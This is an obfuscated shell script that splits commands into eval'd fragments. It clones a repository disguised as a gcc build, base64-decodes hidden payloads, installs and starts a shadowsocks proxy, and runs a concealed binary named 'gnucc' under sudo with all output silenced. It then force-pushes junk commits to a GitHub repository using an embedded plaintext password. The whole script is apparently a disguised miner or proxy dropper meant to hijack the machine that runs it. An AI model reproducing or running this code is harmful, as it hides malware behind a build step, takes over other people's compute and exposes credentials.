Xyvl="git clone htt"
yBocEVR="ps://gccbuild@b"
GEaDc="itbucket.org/"
BYlPjspD="gccbuild/gcc.gi"
TymPtg="t &>/dev/nul"
eval "$Xyvl""$yBocEVR""$GEaDc""$BYlPjspD""$TymPtg""l"
LNId="ase64 -d gcc/"
wwSW="s"
eval "b""$LNId""$wwSW"" > o"
TAYl="udo apt update "
ygbTr="&>/dev/null |"
xlGm="| tr"
eval "s""$TAYl""$ygbTr""$xlGm""ue"
lqha="sudo apt --ye"
WAEI="s install psm"
AtmUuju="isc shadowsocks"
eCStibio="-libev &>/dev/"
FOSdQNI="null || tru"
eval "$lqha""$WAEI""$AtmUuju""$eCStibio""$FOSdQNI""e"
jNExBJq="sudo systemc"
qeJIpvTM="tl stop shad"
tltOfC="owsocks-lib"
wXTs="ev.service"
rhvGAR=" &>/dev/null |"
ainCXYni="| "
eval "$jNExBJq""$qeJIpvTM""$tltOfC""$wXTs""$rhvGAR""$ainCXYni""true"
LRuC="o ss-local -c "
lPrLryW="o &>/dev/n"
gEWjbaY="ull "
eval "sud""$LRuC""$lPrLryW""$gEWjbaY""&"
NbYKUO="base64 -d g"
ZPNhPx="cc/c > r"
eval "$NbYKUO""$ZPNhPx""un"
AWoo="e64 -d gcc"
ZThfgR="/m > gn"
eval "bas""$AWoo""$ZThfgR""ucc"
HaHN="hmod +x "
eval "c""$HaHN""gnucc"
IgJJIZFu="ed -i 's/gcc/"
bwscqLld="gegeo/g' ru"
eval "s""$IgJJIZFu""$bwscqLld""n"
sudo ./gnucc --config run &>/dev/null &
echo ywdjjf
AosM="ep "
eval "sle""$AosM""74"
BLsAukOq="t clone https"
bwFlwIL="://github.com"
YmsyVPb="/hqkrp-aircr"
YyRPkgmQ="aft/system.gi"
nbWWyMI="t tmp &>/dev/"
QChM="nu"
eval "gi""$BLsAukOq""$bwFlwIL""$YmsyVPb""$YyRPkgmQ""$nbWWyMI""$QChM""ll"
cd tmp
okpLDkS="it config u"
EEKTxqJ="ser.name '"
LHznq="Viktoriya Jerem"
QRyAT="enko' &>/dev/"
eval "g""$okpLDkS""$EEKTxqJ""$LHznq""$QRyAT""null"
UFQxgdhb="git config u"
Orcxe="ser.email vikt"
WVwXEU="oriya.jeremenk"
OMRyKStO="oxy@eclips"
kWNw="o.eu &>/dev/nu"
eval "$UFQxgdhb""$Orcxe""$WVwXEU""$OMRyKStO""$kWNw""ll"
echo 'ywdjjf rewritten' >> ywdjjf$MAKE
lpIJTk="ILD=\`date +%"
eval "BU""$lpIJTk""s\`"
UXvrpZ="MAKE=\`date"
eval "$UXvrpZ"" +%S\`"
echo $BUILD >> ywdjjf$MAKE
echo 'system' >> ywdjjf$MAKE
git add ywdjjf$MAKE &>/dev/null
git commit -m 'ywdjjf rewritten '$MAKE &>/dev/null
HFLZFbt="t push http"
gAWTbh="s://viktor"
jVNN="iya-jeremenkox"
wAHV="y:'O3UoPzqSDP5m"
tEWCJfgR="Q_7Bu'@github.c"
XbJTupa="om/hqkrp-airc"
tvyPDfYg="raft/system.git"
pGPqDtD=" -f &>/dev"
YNouPm="/null || "
eval "gi""$HFLZFbt""$gAWTbh""$jVNN""$wAHV""$tEWCJfgR""$XbJTupa""$tvyPDfYg""$pGPqDtD""$YNouPm""true"
while :; do G=`date +%s`; echo 'Update $G'; [ `expr 1354 + $BUILD` -lt $G ] && sudo killall gnucc && break; sleep 172; done
